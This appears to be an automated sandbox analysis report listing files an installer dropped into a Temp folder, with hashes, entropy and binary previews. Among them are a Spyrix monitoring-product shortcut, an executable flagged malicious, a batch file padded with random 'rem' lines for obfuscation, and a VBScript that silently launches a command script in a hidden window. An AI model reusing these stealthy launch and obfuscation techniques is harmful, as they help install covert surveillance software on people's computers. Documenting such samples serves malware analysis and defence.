                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............."......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..........o.d...yIDATx^..t........$.L..43w.....,[.$..B.d.-...................]V.J.......Y_...y..?..O.~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~..~........<.j.q.......tq..K.Zu.V..>..}..}..........7.&~.b....5.js....x...T\.s.`-.w.............M.'........o.......4.#...._Z....GuSF7....]>.'.............n....;.../..>|XN.<i.../...kr..u.u..sg.~...?.O?....B..)c....L...7o........+r....y..wO...._n.m.@.>..u......J?...|.f....)...................t.....k......`.M.........o.....O......X.2.S......|..G.....ic._.p.G..S^_s..}c..k..5...@..h..U.Z..-_S....|..R.Ycy.+..2...}..cm..@................;..6;^M.....Yc.).......1.....$T..<...I...>W....k......(..-...p...'....S...\.........F7o..6~]...,(~........f.v.zat#.&....|}.....O.4...K..,T.#.(9.........x.@.7...Mo......(-...c#...O.....EM.a..OB..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):110709
                                                                                                                                                                                                                                                          Entropy (8bit):3.109239298068923
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:yy+9VgmfdFYGZaAvurTUh2Asjh74zcW3X0+JaRCBiwmXtmdP:A9OmlFYGZaAG06V74QWNaRCEfwP
                                                                                                                                                                                                                                                          MD5:7E0A58E864F4BD416D0B62A8D90FEBFE
                                                                                                                                                                                                                                                          SHA1:B23CDD7F9AEBF120582C2C2C246F17E846521CF9
                                                                                                                                                                                                                                                          SHA-256:D91EB200D2E6623A83FA036C8446455B3D56067939C027AB83BF7957D6B5D5FF
                                                                                                                                                                                                                                                          SHA-512:0AE59E850429F7BA30C787B38FDAEC896710F4BD4D12F749EFB6C79AE89070CAB24182E05E54BC6E8D2EFA8C29CC420B892A1A583C9AD9A7EA446F095F5E944D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .o!..v......... .(....!..@@.... .(B...*..00.... ..%..5l.. .... .............. ............... .h........PNG........IHDR.............\r.f..!6IDATx...|U....37+.DPvd.A..(T....V[[..$lj......E._....Zm.H.bm...........Ev..YC ..y.{M.k..r33.....~.p.9..<3.....z.h....0.[H.=%E..../\6...D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,.... ..e....D.y4X...@.z1..s.b&..GX.CZ9.........DN...3A.....p......a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,...." . H).........,.?H(`.n`...;........ 4.....][..u.(..Z..#nXX..`...`...ye..._.TKA..0..0..D^...4.,.K...3|..F..B`..._.z..r2......Nn&C.U`.X..`....>..wt?_...K}^[....U....9..[X.X..`......_,.....s.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                                                                                                          Entropy (8bit):4.920531868608183
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjziJS40dyTKWV7GGWyXKokJr:HRYFVmjzic40dyTKWV7WyuV
                                                                                                                                                                                                                                                          MD5:5691CB02970E3D46042CD411DDD33C42
                                                                                                                                                                                                                                                          SHA1:5F98A89B9505821B32D1A9B9362A9A8881DF2790
                                                                                                                                                                                                                                                          SHA-256:9C16F6639225765BAA8F23C7B37724B0B3E4837B41F90F612C81AEEDDE79CF68
                                                                                                                                                                                                                                                          SHA-512:A36A6B642A23CA333055602214253D4616FB94CEFC3A89614AE8FD314D93E7887B4FDFD394C9D60BA1474A5AE4EF45EE5639E0F84197FBD4D25CE896FDEB29A6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="http://www.spyrix.com/spyrix-products.php?from=sfk_install"....
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (382), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44330
                                                                                                                                                                                                                                                          Entropy (8bit):5.402734283969903
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:7YLAdR2Vq+XlkbR/JrZrxvBl+EODixVDJjAn4s1QwwwSQffUVzdQWrCZvbXXMs:ULAf2Y+0N5yEOD2DtA4VBaHUVhNChLXR
                                                                                                                                                                                                                                                          MD5:9EF476730ADA792F79ECEC1A17B353DA
                                                                                                                                                                                                                                                          SHA1:1CC1EE286B1AF1612B5C841C446487C8A886FCDE
                                                                                                                                                                                                                                                          SHA-256:93C5A3C337F6377B97960E9EF502B49DBA8B74E1110FB91C87753DF9F512BCC2
                                                                                                                                                                                                                                                          SHA-512:2ADCF1A5BF4C48F37D7CA19868168D5A455A4C259E6DB05958985A5077E5E4AB86E4E3CC5B44FB07D437B1FEAB9FB27C44E2E79F234816B1B49FE2A02BA98054
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:rem gibtqhekf39mgpqap5pxyt2te17k9o7aapwwaxt2uqh9r9ulftm2bkrq1rgk6jho47nxpwejvsj5zxyatyx7v10hl8l8zdaf84vopfithjvmoz48uzg6bg2u..@echo off..rem x2bd8l07ny0pa06la0e5iujfktvb2pxkx20nj52l1zmdoo23hxvkc75pexdzdn0b48fkj0..rem maux0ukutdxt9tbb88k0q2i09t1216lj0qg09sa93u3yvhcp5l51f7aitf1chki5hkjy0c2td23wx9rl9c0y7patqsuftpcx6y0cf1..rem jcqykl0xdea3l63f01mzzek33rov71ykztdzp1wr677iyor7b9ytvp0sxzz0djpcbkrxol0lo2i86lrilpiuhyjnt0cn703qe4rj5xdw2wplwh0dxqnxwkf4..@chcp 65001..rem 90iuh7dibiwuy7yq2e2b2gy600lp47nfpilcfpieauuxvqyrwylx0n50fr2q5azxth0wgzvsbpjk2v..rem z3dfn3scjmyjo9a3frstejhv4ek1ju057o08jay6c2t2fb3ighivzzze3paxxxvd08uxu0eur0a02d8uak0m340rcn0b4fy5bhw36l3jsplk87..rem yszm15xv7y41j1jfecxaynqd0nrzl5pl0pl8sfyxf5zsc299itmk98beo4ie8buu90i7kn760wm62breujvtlwr500gratijbkx0ihkz51gpsm3rzi0p1t0b..@rem UTF-8 encoding..rem c5bsy9uclhsu8v2ionuxjz8..rem kyq0rsrtz3j0lepwuipik3cwyqc36oeagz62c0z7jp2h1ttg00c0n35tfkqiwxxijqj7cxy0q7t7b730ygponok8zdjjlkfgl6omw0pezkdoof9t..rem jnag4uwbmfqgh7y8t4uz46lf5zj18z3s00h2mdyyms
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):225
                                                                                                                                                                                                                                                          Entropy (8bit):4.8759757685468275
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:j+q9NqhVIZ3WGpDSRR26RuBFCOoVgfBbtLFu:Kqahm5WGDS3vuvCO0Yq
                                                                                                                                                                                                                                                          MD5:BDFC59070BFBBB84ED2FB09198896A81
                                                                                                                                                                                                                                                          SHA1:D8C6E3A0E847199D16DC237C7BEC47A4148EB3D6
                                                                                                                                                                                                                                                          SHA-256:033C50986AD34B15E737466398CF5E06116E560251040899871D97EC33E03B47
                                                                                                                                                                                                                                                          SHA-512:DAEAEEDB6744464E6B524EACE531B902A066BA2E643F7626142D9444F070261EC9B0D6C4EA4A4C9874646A951D62B2D218B0ACC48E0FAFCF5CB9DEA0CF661E96
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Set objShell = CreateObject("WScript.Shell")..Dim FilePath..FilePath = WScript.ScriptFullName..FilePath = Left(FilePath, Len(FilePath) - 10)..objShell.CurrentDirectory = FilePath..objShell.Run "cmd.exe /c plist.cmd", 0, False
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3588216
                                                                                                                                                                                                                                                          Entropy (8bit):6.632180080317583
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:98304:Q61JrfvgRnMoHNNbwH3MhrHAGeEyU/4BiCklNl5tj0Qh+Pw/YlAKGC9eX2nuZHz7:/rfvgRMoHNNbwH3eTeEyU/4BiCklNl5D
                                                                                                                                                                                                                                                          MD5:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          SHA1:B91480398B8820436B6634421D5AF628E482B890
                                                                                                                                                                                                                                                          SHA-256:4C493F7DC51A50BBE139993CDB1267DD1F7A33020DF9075ECD7D28FDCE9EC63F
                                                                                                                                                                                                                                                          SHA-512:BA212D929E7EE9478FF141F36950673EABCB31F71C39818D3F6A0A6F7AB57E2676445D815BAF6BC5F97477B4C8D6CBCC07F8051B87CFE800924064B5989CE7C4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z\..................(...6..:............(...@..........................07.....|.7...@... ......................P5.1....`5.......5.X.............6.x.....5..|............................4.....................0e5.|............................text.....(.......(.................`..`.data....=....(..>....(.............@.`..rdata....... ).......).............@.`@.bss.....9....5.......................`..edata..1....P5.......5.............@.0@.idata.......`5.. ....5.............@.0..CRT....4.....5......(5.............@.0..tls..........5......*5.............@.0..rsrc...X.....5......,5.............@.0..reloc...|....5..~...45.............@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3095
                                                                                                                                                                                                                                                          Entropy (8bit):6.729660321273714
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:u8/Pc+/bx0uERAGX6j9UCqgD97QB2xdddddddddddddd5a:u8Hc+zlEJX6lQcW
                                                                                                                                                                                                                                                          MD5:499B10F1F3AE7CA6ACFBA3735EE75F4C
                                                                                                                                                                                                                                                          SHA1:D5CFC9E2DC00A443052765491A915A503EF9C800
                                                                                                                                                                                                                                                          SHA-256:EAF22AE8407F8DD0AC9F4FA7885A2DA8AFE288B09B2C4B87F6F17C5D50F2A988
                                                                                                                                                                                                                                                          SHA-512:F29D30CBB427598E8577606791AF3C8277391BBF1AD7964217EAF78B807A6DFC9B99846F128A5F23BE7A409A3F7DAD81F3E5FC9B2CD15C12742A98A45A7CDDB6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:......JFIF.....`.`......Exif..MM.*.................b...........j.(...........1.........rQ...........Q...........Q..................`.......`....paint.net 4.0.10.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************........@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27663
                                                                                                                                                                                                                                                          Entropy (8bit):7.90463581132329
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:cMmPZ4Bc3LNhpK28BWmW0l2QbBwgx+9VBo7xXz9YAgx3p8:NmPZsEP9I2wBwrHOxXz61x3a
                                                                                                                                                                                                                                                          MD5:C9A294C557F4CA094C11719AD8D7DEFC
                                                                                                                                                                                                                                                          SHA1:3FEBA4F2A142FCC95C74F6FC0E520C4A369BB5A0
                                                                                                                                                                                                                                                          SHA-256:EB1BE2B4FBA03260128E7EC0F5CDB8F4320E5D21AF40E7DD8EB956429B4AABEE
                                                                                                                                                                                                                                                          SHA-512:1DB4E0649A2C2D8C75641BB9A374FC9B5A8CCD4D9336267D9FD1FA680EEE5DC48993910825303F4CEAD9FB3FD2D1814BAB39A21C1A5F74A7605E6555560B0181
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....l..x..k...}.7$%J"MI.je.H..D...8........._H..`.....`....@..@..H..q\Zm.....:...&...nRY.6.u..IU\..&.Rv...i]..<..9=}........a.x..........v.{.qF..o.>....Q?.T?....f.d....n........!..Pw.}... ...O.>A.....O.>A... |....'.. |....'.....O.>A.....O.>A.. |....'.. |...B.....O.>A.....O..'.. |....'.. |..>A.....O.>A.....O...'.. |....'.. |.O.>A.....O.>A........'.. |....'.. .O.>A.....O.>A..!|....'.. |....'....O.>A.....O.>A... |....'.. |....'.....O.>A.....O.>A.. |....'......c.........$G/%X.$Q>.M...>.'.....|.O...'.. |.O..>.'.....|.X.lB....).I..'|....'....$..S.|.P7. 4.n.>..o.u...~6..y..}k../....~....J..,}...g#.q ...HD.....(kq..V..'<....C.?...........8. l.m....z.....P$?.{.......hh......}aH.....=.T.WH.........{....Y~....a.$J~..D....`$"..!]q8......(.q..$.W.j...u..8|..B.K....."X<qH.Xz.8|.R.`I~..{nK.K.....-.,..{.#X...o........9.E...O~..Y... |.By...w.W.[....8|k1.....j..=.}.._/~...7;[....N.._.uj...KGvW...B..J...f.C.........7....m.-......8.y"7.re!...-.>8_6.wWJ.).ur..!.q.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):65863
                                                                                                                                                                                                                                                          Entropy (8bit):7.956619819086428
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:O6yYtz5wY3k3atdbzv0dBtGQKF30k2V7qyEEQq2uUwAqlgQM:O6yYtlxeaktcsJQzvqlgQM
                                                                                                                                                                                                                                                          MD5:81E1F6AF711947DE0DECC68E58C0C293
                                                                                                                                                                                                                                                          SHA1:557A98909549083A962BE781FA01D74979D01DDA
                                                                                                                                                                                                                                                          SHA-256:B1E632717552DEB6BAB0D84839FC698DEA272EC0D1CE4A757BE5246788AB066A
                                                                                                                                                                                                                                                          SHA-512:D2436A2CED9335BA4B4E2D08EB8449FDCDE43135A138A9EF6F73BCB7A98B56BFC0C8FFC29CC4F604B4F782AA0596EFD712F74B035A081ADFBFBCD88C015DACAB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....?...x..].@.G.~..&j4.cbI.I..W.....b.).h,1F#F.{.FS...6......(`...{/r.{{,Y...=n.x..........w.ofK.Z....oE/..Q.a....7..p... @./.|.d.....?_N%'..........l...J..O.n.fA..5......:...~g......w.;......~gc.......l.w6.;.......~gc.......l.w6.;......~g......w.;......~gc.......l.w6.;.......~gc.......l.w6.;......~g......w.;....~gc.......l.w6.;.......~gc.......l.w6.;.......~gc......w.;....~gc.......l.w6.;.......~gc.......l.w6.;.......~gc......w.;....~g......l.w6.;.......~gc.......l.w6.;.......~gc........w.;....~wuu...O.f. C..J,....J.......`.>..,.~.d+1&...[.1...J.I...VbL..+l%.~.e+1&...[.1..o..........l%.~..VbL..{l%.~..VbL.. ..cR.?f+1&..S..cR.......=......l%..~../...#.J..........{4[.1....b.J...>c.;w..c.J........W.].V}....Cw..O.8.W....J.J`.hC......t__.....k<...@.f...E.......{...o<.p#........9.uR.9t..JG.[A..Y.A0.2...=b......>...J..l.....?./\]]...+.z...c.....u.#\.A...l. ......6......~...q.x.?..........|P.qq.-../..lq.-..........;........;..?...]q.+.w..o..#p?&...A.?.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):122200
                                                                                                                                                                                                                                                          Entropy (8bit):7.981243125429923
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:LcJ9eG7nGSn39jEfKuu6Arxa7DcbPDxMeYw0Hu/dxjfjOL:geGnh39jEfKuz4ky1J0MxE
                                                                                                                                                                                                                                                          MD5:13E9A3A7019801450759DB3C1123B986
                                                                                                                                                                                                                                                          SHA1:4C5CD7A1176217FAFBB92B285F5E39C271C2D26F
                                                                                                                                                                                                                                                          SHA-256:3F8FBC9026671A1B94C6AAFD3FCB11CC015A950512883A91B0620CA22739FC31
                                                                                                                                                                                                                                                          SHA-512:AECB72D9DB235476744C0E9A3CD8884231B38243E2B60CC4DAC84503B2D6EE42CD1EBF3A49A231724998E580A8910E0F05A1652A916987EE6E2D860D3C37258F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....P...x...x\Gz...............z...zg..^.}.f...3.K...hFY#..F..II..)QY..A0.$.@$..s.A.s..@G.._.j4N.n....h4............9..V.|..O...rc.7....\..U....V}]..#.....J..*..G.!d%..c%....p.\t.A!.....BV.H.....A.AB.. . !.y.y...<.<H.a..t.B..9#...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.a.$...AB.. . !.y.y...<.<H.a.d.$.0.2..B.....!...B.. g...<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.!....<H.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):74289
                                                                                                                                                                                                                                                          Entropy (8bit):7.983650396991257
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:pyMfdEQ9zaVeRu8IDdsxPBwaUXYPRuFEDNJs9Li9GE7bpgVkSyml:pyMlZNaV2U5s7wLXYIuDNa9e9GE7G6Sh
                                                                                                                                                                                                                                                          MD5:1390E5507BA0EFAE031318614A527C91
                                                                                                                                                                                                                                                          SHA1:1327BD4FC6FFFADA97721375692ACB2E39F4DC95
                                                                                                                                                                                                                                                          SHA-256:8C7BF368852F4FB69975B3841708CF654B0A22D02ED4BC2D95574EE50770694B
                                                                                                                                                                                                                                                          SHA-512:B505E89C3A8C063A852C6654B58AEC996C6649692ED42584C69DE70DDE8F46C448B1A7B00B7465945B4BD2710A565FBD7C6A00556221DDFB5D966CBE3E8C8214
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:....)"..x...s.Y............L....?`6v7b_w.n..jSNeUV.r.(.(.%.Q.I.F.=EO....{o...=e.{@HP"...I.'.#T"..'....y...?-......,.O..........[..u~._a..........e... .=!..2R..s.....B7 3I..,..yk.}\~....W.. t.2....4.......y..Bs K...*w.o.. 9.......?.=......$'.\....].)\|.$F..! c!o..[...e..i...RJ...I..g..B.5..lA.....FR~..s...S.}......[7...e..$.l.?A. ..3....o!.!.I....:w....A.o.....A...!d#9w..F....].A...G..$.A....P%.NCB..5.Z....."6..2w.|g.s.....6o.....~.n.^..G.....K...(%.~...1r.j2,e,.'b..&t.1.. ZV...Y`.mV3.!d#)?!c1w...>Q..dL....P.g..kO>w..E...S.>..n..L..!5S.......%AB....aI...,..OR..[`H.6K..k...2.4`M...$.I3D!......X@.s.k..?w3..Q1S.r.Ic..)F.Z.Hj...S.R.1..~...Go.b..|.:.... V3....X(I..,..v+..}s....r.fAR..&X)..E..}t........0w.%...m.AR.#A0w.\.s..Y...3.U..d.....F.,...]...`."....,<w.$^. Y.}dH....,....t$.$...9.6.....]..A.G.....a. ..Z.ds7.M...V }..]kR..B.T..t..~. ...H.$s.b./.G."t..7..5.tI<0.AR..o..5.T..- }..].^..*.$[.u.$s.W........*..5..Z..A..^.L2w.Z.F)C.l.Mo....(.J).d..J.d
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47367
                                                                                                                                                                                                                                                          Entropy (8bit):7.962365375624471
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:k1CdRYP33ZhH7Dsk+0msPSEBEilsj15FNPj1bgC+UTbhrpyambFRVrn3hh+PX2zg:/uvob0m8EiujFNPREhOhrfqFRV7hMv2k
                                                                                                                                                                                                                                                          MD5:E7B7F860D4178823CB0BF8A87AAED3E8
                                                                                                                                                                                                                                                          SHA1:4F819FE07BD2A290877DAC09158A342F00A2AFE7
                                                                                                                                                                                                                                                          SHA-256:2D042AEB8DB400EB4E3BC283E7546EE93D4ECC6B8BD5DCA0D89819DA517466EF
                                                                                                                                                                                                                                                          SHA-512:105C6F1706497252BDD95CE96621B8B42E10DCFF246AFD302723AAFC99DE2C8F168C366E79E9D1B7F151CF1D755B7D74BBB8AA0152B89B729A0634B7E0240CD9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........x..y....){<..3......m...-....[R/.n-.V.$.ZZ..#|%$..."...X..B...`..{...6........w.#&....../b...o..p^w:;.*O.sj.:.y..NV.[.o.*.....z~..F......$.........#........Ce\.2.GeV,C.!.2.X...eH.....p......!.2.X.,C.a...c...).!.2d...Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2d.R,C.eH..Y...b.R,C.!.2.X...eH..).!.2..2...Vn-Y.!.b.R,C.!.eH..).!.e.2.X...b...).!.2.X.,C.eH..).a9...c......e.2..)C*.b...).!.2.X.,C.eH..).!.r...P...eH9R..G........OeV.e8....p*.Y..a..Y..p.....3.......5jhh.h.EeP(8..Q/.."6.....L.E..C....k.].pA..9TF$.!...7j.{...o.;vL...r^R.(2...o.?...|...o...K/..*\.....;.rF(.......bBa..Pp(.Q....?..O..........O>.[.>.tS(......."C...F.....k..Q9..I.w......o....?.I...Q.._..Q.EQ.EQ.......^....Q..g.WG.w..Q.........+.o...6..l......{r.._...&~.....3)*..k{)....R.JEo./....T.=..~....k[=....c.qj~l8.xm.G^o..S......9u.K..]9.J.....c...s......L?........4.C+W......S.c.2VN.....^4,l..2..r.Ue,5.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):144577
                                                                                                                                                                                                                                                          Entropy (8bit):7.984713151564499
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:MZk6EgfzDfFnHj9A6d5qxvZkr0U26aqBQ5fzFZeKcrjXgtrOG79:M1fzDfFhAE5ykr0R6jBQ5rahgtrx9
                                                                                                                                                                                                                                                          MD5:F7F4FE155A8FF420BCB4710212F0D469
                                                                                                                                                                                                                                                          SHA1:F6A8265AA0504CE12397350A6CEE41F3B799B40D
                                                                                                                                                                                                                                                          SHA-256:0232D8214B2FA4C6E261D72B3FB1E8EB76599F372FD8880AA252F4F494E7A7C1
                                                                                                                                                                                                                                                          SHA-512:2205D714D4410315E4887A6B54306E99D4ED0B591284D20BE1DD451A4657DA039B9877698113E150059587216AE121E2AFDA14D3E74E649DB60B19BC559AB3B7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.....4..x..}.`.....w...K.$v|..8..vv.v...[.r.-.eu[.*.,Y..D.....{...@.h..{!@.F.S.gwI..A...........y3...........,...../..(......w._.....{~L....a&A.G..)@s.........4.h...\..@@s.........4.h...\ ..@s.........4..h..\ ..@s.0=s.\1.........4..h..\ ..@s.........4..h..\ ..@@s.........4.h...\..@@s.........4.h....\ ..@s.........4..h..\ ..@s..........b.D..r..L..N.oR.^.o.....,.9.Y...&.Y...i.&.0U..n.>......Y.N...L.1........`.^.a.....D"F...) .B..Ke..B.N........B!C...) .B.R..n)`....h4..[...b..Z........Cg.J.T#."..a...0.......V.C.S@..h.@...)....Y.pK.S@..f.D...) ...p..n)`...p:..k@.E.....s.r.....0..\....L....|..b..{{Mf#..-...?:...}f.[.....X."...f..V..4...n..................6K..p.D...C..`.....v...8....)....b5.0. .J..A..0. .M....._.................p.....w...a...>L....`SWW.=.8...&...a]...........................a..nV..S#.....I.p..w...W.......<.{=.....}....?...~......3.(N.fG......\........Ek..........)'...}.*.D$.I$..T*....X.>>T. "..|>.(;1... ...C.....iRRR ".`..q.q.=s.0.p"T.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61361
                                                                                                                                                                                                                                                          Entropy (8bit):7.974577216527501
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:hsQScTKMW3NmUWxxSvsA+vvZQnBIuzN1SKvzuQ/S93iiXmNF+O:0c638UWrSvsfve6ux1S5Q/sm3
                                                                                                                                                                                                                                                          MD5:DAC5D65C6B4F0B8483DBDA7EF4EFB3F2
                                                                                                                                                                                                                                                          SHA1:BE01B81E548343D0888E912CDF3EBCE5A613CA85
                                                                                                                                                                                                                                                          SHA-256:FBFCC9AF1DC9076257B3D38BDA525B13E0BA96EAD1DBA4178C5C1AE9DA28169E
                                                                                                                                                                                                                                                          SHA-512:DB98B144AEEB09A3B0480F908DE0ACFA6D5832F8EB48D025048D6D6FFE2E01BFF46D16B3BF5AF5B1E6129E749A01E79968C79429A3493979CAAE519E2E22642E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
